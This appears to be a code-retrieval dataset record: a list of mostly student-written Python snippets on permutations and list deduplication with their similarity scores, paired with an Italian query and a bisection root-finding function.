[ "def permutations(lst):\n pass # Replace this with your implementation of the function.", "def permuta(L):\n return list(permuta_aux(L))", "def listDuplicate(self,permutations=True):\n ind,ok = self.testDuplicate(permutations)\n return ind[~ok]", "def unique():\r\n \r\n lista = main(8)\r\n nuevaLista = []\r\n while len(nuevaLista) < 12:\r\n\r\n for i in range(len(lista)):\r\n if lista[i] not in nuevaLista and not in_family(nuevaLista, lista[i]):\r\n nuevaLista.append(lista[i])\r\n \r\n return nuevaLista", "def full_permut_once_all(l):\n if len(l) == 1:\n return l\n else:\n perms = []\n for i in range(len(l)):\n cur = l[i]\n rest= l[:i] + l[i+1:]\n sub = full_permut_once_all(rest)\n # print('cur,rest,sub:',cur,rest,sub)\n cur_set = [[cur]+s for s in (sub if isinstance(sub[0],list) else [sub])]\n perms.append(cur_set)\n return perms", "def listUnique(self,permutations=True):\n ind,ok = self.testDuplicate(permutations)\n return ind[ok]", "def make_unique(lista):\n f = []\n for it in lista:\n if it not in f:\n f.append(it)\n return f", "def clean_repeat(rp):\n\treturn list(set(rp))", "def permutations(config):\r\n return list(set(itertools.permutations(config)))", "def _get_fresh_permutations(self):\n self.permutations = []\n for i in self.permutation_numbers:\n self.permutations.append(copy.copy(self.content.find(\"permutation\", number=i)))", "def copy(self,list):\r\n\t\tnew = []\r\n\t\ti = 0\r\n\t\twhile i<len(list):\r\n\t\t\tif (self.exist(new,list[i]) == False):\r\n\t\t\t\tnew.append(list[i])\r\n\t\t\ti=i+1\r\n\t\treturn new", "def sem_repetidos (l): # n = len(l), O(n^2)\n resultado = []\n for e in l: # n vezes\n if not e in resultado: # 1 + O(n)\n resultado.append(e) # O(1)\n return resultado", "def unique_permutations(items):\n return set(permutations(items))", "def permute(lst):\n tups = []\n tup = []\n if len(lst) > 1:\n tup = [(lst[i],lst[j]) for i in range(len(lst)) for j in range(i+1, len(lst))]\n tups.extend(tup)\n return tups", "def superposiciones(materias):\n\n combinaciones = []\n for materia in materias:\n\n nuevas = []\n for curso in materia['cursos']:\n\n for combinacion in combinaciones:\n if _cursos_compatibles(combinacion, curso):\n nuevas.append(combinacion + [curso])\n\n # cuando no hay combinaciones agregar el curso directamente\n if not combinaciones:\n nuevas.append([curso])\n\n combinaciones = nuevas\n\n return combinaciones", "def Deduplicate(items):\n seen = set()\n for it in items:\n if it not in seen:\n seen.add(it)\n yield it", "def permute(xs):\n return list(permutations(xs))", "def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\n nums.sort()\n n = len(nums)\n ans, res = [], []\n\n for i in range(2**n, 2**(n+1)):\n # generate bitmask, from 0..00 to 1..11\n bitmask = bin(i)[3:]\n res = [nums[j] for j in range(n) if bitmask[j] == '1']\n if res not in ans:\n ans.append(res)\n\n return ans\n # print(ans)", "def tri_si_rencontre(self, joueurs_tries, liste_rencontres, nb_joueurs):\n # We recover the possibilities\n for x in joueurs_tries:\n liste_dict = []\n for y in joueurs_tries:\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n continue\n else:\n liste_dict.append(y)\n self.dict_possiblity[x] = liste_dict\n copy_joueurs = list(joueurs_tries)\n liste_finale = []\n nb_tour = 0\n error = False\n while joueurs_tries:\n x = joueurs_tries[0]\n for y in joueurs_tries:\n if nb_tour > nb_joueurs**2:\n print(\"Il y a une erreur dans l'algorithme.\")\n error = True\n break\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n nb_tour += 1\n continue\n else:\n i = 0\n # we are looking for a unique possibility\n for key in list(self.dict_possiblity):\n if len(self.dict_possiblity[key]) == 1:\n valeur = self.dict_possiblity[key][0]\n liste_finale.append((key, valeur))\n liste_rencontres.append((key, valeur))\n joueurs_tries.remove(key)\n joueurs_tries.remove(valeur)\n self.sup_dicti(valeur, key)\n i += 1\n break\n if i > 0:\n break\n # we remove both of the possibilities\n self.sup_dicti(x, y)\n liste_finale.append((x, y))\n liste_rencontres.append((x, y))\n joueurs_tries.remove(y)\n joueurs_tries.remove(x)\n break\n if error:\n liste_finale = Vue().demander_binomes(copy_joueurs,\n nb_joueurs)\n return liste_finale\n return liste_finale", "def _deduplicate(lst):\n out = []\n for i in lst:\n if i not in out:\n out.append(i)\n return out", "def insercionListas(L1,L2):\n return set(L1) & set(L2)", "def removeDoublon(liste):\n tmp=[]\n for i,elt in enumerate(liste):\n if elt not in tmp:\n tmp.append(elt)\n return tmp", "def ordonare_cresc_dupa_pret(lst):\n\treturn sorted(lst, key=get_pret_achizitie)", "def mutant(self):\n _mutant = []\n _wt = self.wildtype\n for i in range(0, len(self.mutations)):\n site = _wt[i]\n options = self.mutations[i]\n if options is None:\n _mutant.append(_wt[i])\n else:\n for o in options:\n if o != site:\n _mutant.append(o)\n return \"\".join(_mutant)", "def elim_reps(lst):\n ans = []\n for x in lst:\n if x not in ans:\n ans.append(x)\n return ans", "def permutations(iterable):\n pass", "def uniq(listinput):\n\t\"\"\" This will be provided for the student. \"\"\"\n\toutput = []\n\tfor x in listinput:\n\t\tif x not in output:\n\t\t\toutput.append(x)\n\treturn output", "def permutations(digits, my_list):\r\n \r\n if len(my_list[0]) == len(digits) and len(my_list) > 0:\r\n return my_list\r\n else:\r\n new_list = []\r\n for item in my_list:\r\n for digit in digits:\r\n if digit not in item:\r\n new_item = item + digit\r\n new_list.append(new_item)\r\n return permutations(digits, new_list)", "def gen_permutations(outcomes, length):\r\n \r\n ans = set([()])\r\n for dummy_idx in range(length):\r\n temp = set()\r\n for seq in ans:\r\n for item in outcomes:\r\n new_seq = list(seq)\r\n if new_seq.count(item) == 0:\r\n new_seq.append(item)\r\n temp.add(tuple(new_seq))\r\n ans = temp\r\n return ans", "def delDoublon(values):\n\treturn list(set(values))", "def remove_duplicates(possible_vulns):\n return list(set(possible_vulns))", "def remove_duplicates_badSolution( li ):\n newli=[]\n seen = set()\n for item in li:\n if item not in seen:\n seen.add( item )\n newli.append(item)\n\n return newli", "def sprawdz(lista):\n # do_usuniecia - lista zawierajaca indeksy pol ktore zostana usuniete z glownej listy\n do_usuniecia = []\n # petla przechodzaca po wartosciach\n for i in range(len(lista) / 2):\n # j - indeks wartosci dla poszczgolnego panstwa\n j = 2 * i + 1\n # k - indeks pod ktorym nie ma wartosci\n k = 0\n # sprawdzanie ktore elementy sa bez wartosci oraz dodawanie ich do listy do usuniecia\n for el in lista[j]:\n if el is None:\n # zastosowanie unikalnosci indeksow\n if not k in do_usuniecia:\n do_usuniecia.append(k)\n\n k += 1\n # sortowanie listy z indeksami do usuniecia w sposob rosnacy\n do_usuniecia.sort()\n # nowalista - lista zawierajaca statystyki dostepne dla wszystkich panstw odpowiednio [Lata],[Wartosc]\n nowalista = []\n for i in range(len(lista)):\n # wartosc - lista zawierajaca poszczegolne dane z glownej listy\n wartosc = []\n # dodawanie wartosci, ktore sa dostepne dla wszystkich panstw do tabeli wartosc\n for j in range(len(lista[i])):\n # zastosowanie unikalnosci indeksow dla ktorych nie ma wartosci\n if not j in do_usuniecia:\n wartosc.append(lista[i][j])\n # dodawanie listy zawierajacej wynik dla poszczegolnych danych\n nowalista.append(wartosc)\n\n return nowalista", "def preencherJogadores():\n global jogadores\n for x in participantes:\n if x['porta'] != lider['porta']:\n jogadores.append(x)", "def unique(list1):\n \n # intilize a null list \n unique_list = [] \n \n # traverse for all elements \n for x in list1: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x)\n return unique_list", "def mod_lista_oglindit(lista_1, lista_divizori):\n lista_finala = []\n for element in lista_1:\n if verifica_element_divide_lista(element, lista_divizori):\n oglindit = get_oglindit(element)\n lista_finala.append(oglindit)\n else:\n lista_finala.append(element)\n return lista_finala", "def listops_uniq(list_a):\r\n retlist = []\r\n for item in list_a:\r\n if item not in retlist:\r\n retlist.append(item)\r\n\r\n return retlist", "def modify(test_case):\r\n n=len(test_case)\r\n mod_test_cases=[]\r\n for i in range(n):\r\n mod_test_case=test_case[:]\r\n #print(mod_test_case[i])\r\n mod_test_case[i]= not mod_test_case[i]\r\n mod_test_cases.append((mod_test_case,i))\r\n return mod_test_cases", "def list_permutations(n,r, multiset=False):\n if not multiset:\n return list(itertools.permutations(n,r))\n\n elif multiset:\n return set(list(itertools.permutations(n,r)))", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def cambiar_Fichas(self,lista):\n self.rellenar_atril()\n for letra in lista:\n self.bolsa.agregar_bolsa(letra, 1)\n random.shuffle(self.bolsa.bolsa)", "def dedupe_list(input):\n return list(set(input))", "def AllPermutations(data):\n if len(data) <= 1:\n return data\n\n return [p for p in itertools.permutations(data)]", "def nextPermutation(self, nums: List[int]) -> None:\n pass", "def permutation(nums):\n list = []\n temp = []\n backtrack(list, temp, nums)\n return list", "def permute(seq, permutation):\n return [seq[i] for i in permutation]", "def carac_reproducciones(caracteristica, valor_min, valor_max, catalog):\n artistasNoRepetidos = lt.newList('ARRAY_LIST')\n artistasRepetidos = lt.newList('ARRAY_LIST')\n MapCaracteristicas = mp.get(catalog['caraContenido'], caracteristica)\n RBTcaracteristica = me.getValue(MapCaracteristicas)\n lista_listas_musica = om.values(RBTcaracteristica, valor_min, valor_max)\n lista_lista_musica = it.newIterator(lista_listas_musica)\n while it.hasNext(lista_lista_musica): \n lista_musica = it.next(lista_lista_musica)#lista_musica es un dicc de listas que tengo que recorrer \n musicas = it.newIterator(lista_musica)\n while it.hasNext(musicas):\n musica = it.next(musicas) #iterar sobre esta lista por artist_id\n if int(lt.isPresent(artistasNoRepetidos, (musica['artist_id']))) == 0:\n lt.addLast(artistasNoRepetidos, musica['artist_id'])\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n else:\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n return lt.size(artistasRepetidos), lt.size(artistasNoRepetidos)", "def ordenar_lista_menor_a_mayor_produccion(lista):\r\n largo_lista = len(lista)\r\n for i in range(largo_lista):\r\n for j in range(largo_lista-1):\r\n if lista[j+1] and lista[j][2] > lista[j+1][2]:\r\n auxiliar = lista[j+1]\r\n lista[j+1] = lista[j]\r\n lista[j] = auxiliar\r\n return lista", "def mutare_obiecte(old_loc, new_loc, lst):\n\texista_old_loc = False\n\tfor obiect in lst:\n\t\tif get_locatie(obiect) == old_loc:\n\t\t\texista_old_loc = True\n\t\t\tobiect[\"locatie\"] = new_loc\n\tif exista_old_loc is False:\n\t\traise ValueError(\"Locatia din care incercati sa mutati obiecte nu exista!\")\n\tif len(new_loc) != 4:\n\t\traise ValueError(\"Locatia noua trebuie sa aiba exact 4 caractere!\")\n\tif old_loc == new_loc:\n\t\traise RuntimeError(\"Locatia noua coincide cu cea curenta!\")\n\treturn lst", "def permutations(xs):\n if not xs:\n yield []\n else:\n for x, xs in selections(xs):\n for ys in permutations(xs):\n yield [x] + ys", "def objets_uniques(self):\n objets = []\n for membre in self.membres:\n for objet in membre.equipe:\n if objet.unique:\n objets.append(objet)\n objets.extend(objet.prototype.objets_contenus(objet))\n if membre.tenu and membre.tenu.unique:\n objet = membre.tenu\n objets.append(objet)\n objets.extend(objet.prototype.objets_contenus(objet))\n\n return objets", "def generarCombinaciones(self):\n combi = [list(x) for x in itertools.combinations(self.ResultConsultaLibre, 2)]\n self.CombiConsultaLibre=combi\n #print(self.CombiConsultaLibre)", "def _unique(li):\n return list(set(li))", "def update(self, list_of_sets):\n for s in list_of_sets:\n self.add(s)", "def lego_sets():\n # you must replace this line and return your own list\n return []", "def palindroame_multimi(lista_1, lista_2):\n lungime = lungime_multimi(lista_1, lista_2)\n lista_palindroame = []\n for i in range(0, lungime):\n element = str(lista_1[i]) + str(lista_2[i])\n if is_palindrome(element):\n lista_palindroame.append(int(element))\n return lista_palindroame", "def combinar(memoria):\n\n antLibre = False\n antEspacio = 0\n\n for part in memoria[:]:\n if antLibre and part[1] == None:\n part[0] += antEspacio\n del memoria[memoria.index(part) - 1]\n\n if part[1] == None:\n antLibre = True\n else:\n antLibre = False\n\n antEspacio = part[0]\n\n return memoria", "def apply_permutation(l, p):\n\n for i in xrange(len(l)):\n nxt = i\n print 'change - ', i\n while p[nxt] >= 0:\n print 'before-', i, p[nxt], l, p\n\n l[i], l[p[nxt]] = l[p[nxt]], l[i]\n temp = p[nxt]\n p[nxt] -= len(p)\n nxt = temp\n print 'after -', i, p[nxt], l, p\n\n\n print l", "def test_listes():\n listes = [Liste(mot) for mot in (\"SE\", \"PAS\", \"DE\", \"DEVIS\")]\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[0] apres liste[1], puis un mot vide\")\n listes[1].suffixe(listes[0])\n listes[1].suffixe(Liste(\"\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[1] apres listes[2] et listes[0] apres listes[3]\")\n listes[2].suffixe(listes[1])\n listes[3].suffixe(listes[0])\n data_tycat(listes)\n _ = input()\n print(\"on efface 'DEVIS'\")\n del listes[3]\n data_tycat(listes)\n _ = input()\n # # test dans le cas où le doublage ne se fait pas à la tête de la liste\n # print(\"on efface 'DEPASSE'\")\n # del listes[2]\n # data_tycat(listes)\n # _ = input()\n print(\"on ajoute 'NT' apres 'PASSE'\")\n listes[1].suffixe(Liste(\"NT\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute 'SE' apres elle-meme\")\n listes[0].suffixe(listes[0])\n data_tycat(listes)\n # # supression de SE\n # _ = input()\n # print(\"on efface 'SE'\")\n # del listes[0]\n # data_tycat(listes)", "def from_list():\n my_list = [1, 2, 3, 3, 3, 4]\n my_set = set(my_list)\n #new_list = [my_set] # [set([1, 2, 3, 4])]\n new_list = list(my_set) # [1, 2, 3, 4]\n print(new_list)", "def part_1():\n return itertools.permutations(range(5))", "def permute(l):\n perm = []\n if len(l) == 0:\n perm.append([])\n else:\n first_element = l[0]\n after_first = slice(1, None)\n sub_permutes = permute(l[after_first])\n for p in sub_permutes:\n for j in range(0, len(p) + 1):\n r = copy.deepcopy(p)\n r.insert(j, first_element)\n perm.append(r)\n return perm", "def add_sets(list_of_sets):\n global true_introns\n for item in list_of_sets:\n true_introns.update(item)", "def unique_contigs_are_unique(scaffold_list, unique_contigs_list):\n i= 0\n old_scaffold_list = copy.deepcopy(scaffold_list)\n old_scaffold_list = purge_redundancy(old_scaffold_list)\n new_scaffold_list = []\n while new_scaffold_list != old_scaffold_list and i < 20:\n \n i += 1\n if i != 1: \n old_scaffold_list = copy.deepcopy(new_scaffold_list)\n #new list is now old list\n new_scaffold_list = new_resolve_unique_contigs(old_scaffold_list, unique_contigs_list) \n new_scaffold_list = purge_redundancy(new_scaffold_list)\n\n return new_scaffold_list", "def test_multi_same(nothing_list):\n result = multi_same_list(nothing_list)\n assert result[1][2] == 0\n assert result[0][2] == 0", "def list_should_not_contain_duplicates(self,list_,msg=None):\r\n if not isinstance(list_,list):\r\n list_= list(list_)\r\n dupes = []\r\n for item in list_:\r\n if item not in dupes:\r\n count = list_.count(item)\r\n if count >1:\r\n logger.info(\" '%s' found %d times\" %(item,count))\r\n dupes.append(item)\r\n if dupes:\r\n raise AssertionError(msg or '%s found multiple times' %seq2str(dupes))", "def unique(input_list): \n try:\n # intilize a null list \n unique_list = [] \n # traverse for all elements \n for x in input_list: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x)\n return(unique_list)\n except TypeError as detail:\n return (\"int object is not iterable\")", "def generos_existentes(catalog, generos):\n lista_repetidos_total = lt.newList('ARRAY_LIST')\n list_generos = generos.split(\",\")\n for genero in list_generos:\n artistasNoRepetidos = lt.newList('ARRAY_LIST')\n artistasRepetidos = lt.newList('ARRAY_LIST')\n MapGeneros = mp.get(catalog['musicaGenero'], genero)\n RBTgenero = me.getValue(MapGeneros)\n valor_min = om.minKey(RBTgenero)\n valor_max = om.maxKey(RBTgenero)\n lista_listas_musica = om.values(RBTgenero, valor_min, valor_max)\n lista_lista_musica = it.newIterator(lista_listas_musica)\n while it.hasNext(lista_lista_musica): \n lista_musica = it.next(lista_lista_musica)\n musicas = it.newIterator(lista_musica)\n while it.hasNext(musicas):\n musica = it.next(musicas)\n if int(lt.isPresent(artistasNoRepetidos, musica['artist_id'])) == 0:\n lt.addLast(artistasNoRepetidos, musica['artist_id'])\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n #if int(lt.isPresent(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n # lt.addLast(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n else:\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n #if int(lt.isPresent(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n # lt.addLast(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n \n print(str(genero) + ' is between ' + str(valor_min) + ' and ' + str(valor_max))\n print('Total of reproduction: ' + str(lt.size(artistasRepetidos)) + ' Total of unique artists: ' + str(lt.size(artistasNoRepetidos))) \n print('--------------- Some artists for ' + str(genero) + ' -----------')\n i = 0\n while i <= 9:\n print('Artist ' + str(i) + ': ' + lt.getElement(artistasNoRepetidos, i))\n i += 1\n print('Total of reproduction is ' + str(lt.size(lista_repetidos_total)))", "def copy_unique_elements(list_of_all):\n unique_list = []\n for i in list_of_all:\n if i not in unique_list:\n unique_list.append(i)\n if len(unique_list) == int(top_count):\n break\n return unique_list", "def gen_permutations_re(outcomes):\r\n\r\n if len(outcomes) == 1:\r\n ans = set()\r\n temp = []\r\n temp.append(outcomes[0])\r\n ans.add(tuple(temp))\r\n return ans\r\n\r\n rest_permutations = gen_permutations_re(outcomes[1:])\r\n\r\n answer = []\r\n for perm in rest_permutations:\r\n perm = list(perm)\r\n for i in range(len(perm) + 1):\r\n temp = perm[:]\r\n temp.insert(i, outcomes[0])\r\n answer.append(tuple(temp))\r\n\r\n return set(answer)", "def get_kritis(self, kriti_list):\n self.kritis = [[k.name, k.composer, k.link] for k in kriti_list if \n k.raga == self.name]", "def task7_unique_number(lst):\n unique = []\n for elem in lst:\n check_list = lst.copy()\n lst.remove(elem)\n if elem not in lst:\n unique.append(elem)\n lst = check_list\n return unique", "def location_list(lista: list):\n rezultat_final = []\n for element in lista:\n if get_locatie(element) not in rezultat_final:\n rezultat_final.append(get_locatie(element))\n return rezultat_final", "def ulist(M, pos,v):\n import copy\n list= copy.deepcopy(M)\n list[pos]=v\n return list", "def remove_duplicates(self,list_):\r\n ret =[]\r\n\r\n for item in list_:\r\n if item not in ret:\r\n ret.append(item)\r\n removed = len(list_)-len(ret)\r\n logger.info('%d duplicate%s removed.' %(removed,plural_or_not(removed)))\r\n return ret", "def permute(p,l,length):\n assert length >= 0\n if length == 0:\n\tprint p\n\treturn\n\n for i in range(0,length):\n\tn = p + (l[i],) \n\tpermute(n,l[0:i]+l[i+1:],length-1)", "def incrucisare_genetica(parinte1: str, parinte2: str):\n index_ruptura = random.randint(2, 26)\n copil1 = parinte1[0:index_ruptura] + parinte2[index_ruptura:]\n copil2 = parinte2[0:index_ruptura] + parinte1[index_ruptura:]\n pozitii_duplicate_copil1 = determina_duplicate_copil(copil1, index_ruptura)\n pozitii_duplicate_copil2 = determina_duplicate_copil(copil2, index_ruptura)\n if len(pozitii_duplicate_copil1) > 0:\n lista_copil1 = [litera for litera in copil1]\n lista_copil2 = [litera for litera in copil2]\n for i in range(0, len(pozitii_duplicate_copil1)):\n lista_copil1[pozitii_duplicate_copil1[i]], lista_copil2[\n pozitii_duplicate_copil2[i]] = lista_copil2[\n pozitii_duplicate_copil2[\n i]], \\\n lista_copil1[\n pozitii_duplicate_copil1[\n i]]\n\n copil1 = \"\"\n copil2 = \"\"\n for i in range(0, len(lista_copil1)):\n copil1 += lista_copil1[i]\n copil2 += lista_copil2[i]\n return copil1, copil2", "def fill_list(preference_list, name_set):\n l = [preference_list[0]]\n names = name_set.copy()\n for name in preference_list[1:]:\n # Remove duplicates as well\n if name not in l:\n l.append(name)\n # This check is needed so people who put the same person twice don't throw an error\n if name in names:\n names.remove(name)\n l.extend(sorted(list(names)))\n return l", "def potential_new_obs(self) -> Iterable[GriddedPerm]:", "def unused(permutation, nb_elements):\n return tuple(set(range(nb_elements)) - set(permutation))", "def unique(list_of_links):\n return list(set(list_of_links))", "def unique(list1):\n # insert the list to the set\n list_set = set(list1)\n # convert the set to the list\n unique_list = (list(list_set))\n for x in unique_list:\n return(x,)", "def setListRandomFromList(ldata, ldataRepl):\n\tl = len(ldata)\n\tselSet = set()\n\tfor d in ldataRepl:\n\t\ti = randint(0, l-1)\n\t\twhile i in selSet:\n\t\t\ti = randint(0, l-1)\n\t\tldata[i] = d\n\t\tselSet.add(i)", "def unique_list2(mylist):\n\n newlist = []\n for num in mylist:\n if num not in newlist:\n newlist.append(num)\n print(newlist)", "def test_list_identity(self):\n pass", "def exercise_b2_2():\r\n letters = ['a', 'e', 'i', 'o', 'u', 'u']\r\n combinations = list(permutations(letters))\r\n uniq_combinations = set(combinations)\r\n total_possibilities = len(combinations)\r\n total_uniq_possibilities = len(uniq_combinations)\r\n print(\"\\nThere are %s possible combinations and %s unique combinations for this set\\n\" \r\n % (total_possibilities, total_uniq_possibilities))\r\n return", "def permutation(lst):\n if(len(lst)==0):\n return []\n \n \"\"\"If there is only one item in the list then there is\n only one possible permutation\"\"\"\n if(len(lst)==1):\n return [lst]\n \n \"\"\"More than one item in the list\"\"\"\n \n \"\"\"Empty list that we will store the current perm in\"\"\"\n l = []\n \n \"\"\"Iterate through the input list and calculate the perms\"\"\"\n for i in range(len(lst)):\n m = lst[i]\n \n \"\"\"Extract m=lst[i] from the list and deal with \n the remaining list portion\"\"\"\n remlst = lst[:i] + lst[i+1:]\n \n \"\"\"Generate all permutations where m is the first element\"\"\"\n for p in permutation(remlst):\n l.append([m]+p)\n\n return l", "def potentials(self, potential_list):\n for item in potential_list:\n item.store()\n potential_list_uuids = [item.uuid for item in potential_list]\n self.set_attribute('potentials', potential_list_uuids)", "def generateCandidates(self):\n\t\tprint(\"Candidate list:\\n\")\n\t\tkeys = list(self.prune_list.keys())\n\t\ttuple_count = len(keys[0])\n\t\tprune_list = {}\n\t\ttup = []\n\t\tfor v in comb(keys, 2):\n\t\t\ta = set(v[0])\n\t\t\tb = set(v[1])\n\t\t\t\n\t\t\t# If there's as many common element in a & b as one less than tuple_count\n\t\t\tif((len(a & b) == (tuple_count - 1)) and (tuple(a | b) not in tup)):\n\t\t\t\ttup.append(tuple(a | b))\n\t\t\t\tprint(tup[-1])\n\t\t\t\t# Update prune list\n\t\t\t\tcount = self.getSupport(tup[-1])\n\t\t\t\tif(count >= self.support):\n\t\t\t\t\tprune_list[tup[-1]] = count\n\t\treturn prune_list", "def deduped(items):\n \n return list(set(items))", "def fn(i):\n if i == len(nums): ans.append(nums.copy())\n seen = set()\n for k in range(i, len(nums)):\n if nums[k] not in seen:\n seen.add(nums[k])\n nums[i], nums[k] = nums[k], nums[i]\n fn(i+1)\n nums[i], nums[k] = nums[k], nums[i]", "def copy_list(self,list_):\r\n return list_[:]", "def updateEmpleadosLista(name,venta): #Esta sección fue hecha por Valeria\n index = 0\n for register in venta:\n if name in register:\n venta[index] [1] += 1\n index += 1\n return venta", "def unique(li):\r\n seen = set()\r\n seen_add = seen.add\r\n return [x for x in li if not (x in seen or seen_add(x))]", "def __scatterRepeated ( self, posList ):\n\n #-- 1 --\n # [ numNonReps := len(self.posSpecs) - 1\n # numReps := len(posList) - (len(self.posSpecs) - 1) ]\n # NB: numNonReps is the total number of non-repeating required\n # arguments, and numReps is the number of positionals from posList\n # that correspond to the repeated argument.\n numNonReps = len(self.posSpecs) - 1\n numReps = len(posList) - numNonReps\n\n #-- 2 --\n # [ if numReps < 0 ->\n # sys.stderr +:= (usage message) + (error message)\n # stop execution\n # else -> I ]\n if numReps < 0:\n usage ( self.switchSpecs, self.posSpecs,\n \"Only %d positional arguments were supplied, \"\n \"need at least %d.\" %\n ( len(posList), len(self.posSpecs) - 1 ) )\n\n #-- 3 --\n # [ self.posMap +:= entries mapping keys of\n # self.posSpecs[0:self.__repx] |-> poslist[0:self.__repx] ]\n for posx in range ( self.__repx ):\n self.posMap[self.posSpecs[posx].key] = posList[posx]\n\n #-- 4 --\n # [ self.posMap +:= an entry mapping the key of\n # self.posSpecs[self.__repx].key |-> the list\n # posList[self.__repx:self__repx+numReps] ]\n self.posMap[self.posSpecs[self.__repx].key] = (\n posList[self.__repx:self.__repx+numReps] )\n\n #-- 5 --\n # [ self.posMap +:= entries mapping keys of\n # self.posSpecs[self.__repx+1:] |->\n # posList[self.__repx+numReps:] ]\n for spex in range ( self.__repx+1, len(self.posSpecs)):\n sourcex = spex - 1 + numReps\n self.posMap[self.posSpecs[spex].key] = posList[sourcex]", "def part_2():\n return itertools.permutations(range(5, 10))", "def getMutation(AA,Codon):\r\n temp_mutationlist = []\r\n '''create a list of possible triplets within hamming distance 1 '''\r\n for item in INI.genetic_code.keys():\r\n isvalid = INI.isvalidtriplet(item,Codon)\r\n ''' Hamming distance 1, AA is not equal to the given AA,forbid mutation to stopcodon '''\r\n if (isvalid == True and AA !=INI.genetic_code[item] and INI.genetic_code[item]!=\"*\"):\r\n temp_mutationlist.append(item)\r\n \r\n \r\n aalist = []\r\n # generate a list of all possible amino acids resulting from the temp_mutationlist \r\n for item in temp_mutationlist:\r\n if (item in INI.genetic_code):\r\n aalist.append(INI.genetic_code[item])\r\n else:\r\n aalist.append(\"n\")\r\n \r\n return(temp_mutationlist,aalist)", "def representative_combos(list_1: list[str], list_2: list[str]) -> list[tuple[str, str]]:\n all_selected_combinations: list[tuple[str, str]] = []\n for i in range(max(len(list_1), len(list_2))):\n all_selected_combinations.append((list_1[i % len(list_1)], list_2[i % len(list_2)]))\n return all_selected_combinations", "def checkLists(self):\n self.x = self.checkList(self.x)\n self.y = self.checkList(self.y)\n return", "def all_in_set(the_set, the_list):\n return True", "def powerset(lst):\n return reduce(lambda rslt, x: rslt + [subset + [x] for subset in rslt],\n lst, [[]])" ]
[ "0.6468891", "0.636794", "0.62925", "0.6233623", "0.61992514", "0.6176376", "0.61639607", "0.6095989", "0.60220444", "0.5991031", "0.59071577", "0.58907956", "0.5854479", "0.5828909", "0.57634", "0.57418424", "0.57263476", "0.5719343", "0.5716875", "0.56898516", "0.56706095", "0.5669724", "0.5662266", "0.56273204", "0.5618664", "0.5614173", "0.5610244", "0.56052774", "0.5593584", "0.5573937", "0.55644214", "0.556361", "0.556273", "0.5562136", "0.55557454", "0.5553421", "0.5550209", "0.5542105", "0.55398875", "0.55380183", "0.5531014", "0.55301183", "0.55228966", "0.5480295", "0.54699504", "0.54577416", "0.5457382", "0.54545283", "0.5449773", "0.5439458", "0.54351586", "0.54217285", "0.5420119", "0.54157037", "0.5411821", "0.54081815", "0.54066604", "0.5390568", "0.5384541", "0.53834456", "0.53776723", "0.5376677", "0.5374945", "0.53631085", "0.53600717", "0.5358929", "0.53561157", "0.5352538", "0.5347334", "0.53443", "0.5328414", "0.53216684", "0.5318973", "0.53159356", "0.5309738", "0.5296073", "0.52956325", "0.52923983", "0.5285092", "0.5283161", "0.5276535", "0.5276187", "0.52709824", "0.52560157", "0.52537334", "0.5252813", "0.5246771", "0.52436495", "0.5242382", "0.5241101", "0.5236979", "0.523207", "0.522601", "0.522126", "0.5220646", "0.52099967", "0.52068967", "0.52060264", "0.5199364", "0.51967657", "0.5195924" ]
0.0
-1
Trova uno zero della funzione f tra i punti a e b, dove la f assume segno discorde. Il parametro opzionale toll indica la precisione con cui si vuole calcolare il valore dello zero
def bisezione(f,a,b,toll=10**-5): m = (a+b)/2 f_m = f(m) while abs(f_m) > toll: if f(a)*f_m < 0: b = m elif f(b)*f_m < 0: a = m elif f_m == 0: print("Trovata solzione esatta") return m else: print("Metodo fallito") return None m = (a+b)/2 f_m = f(m) return m
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
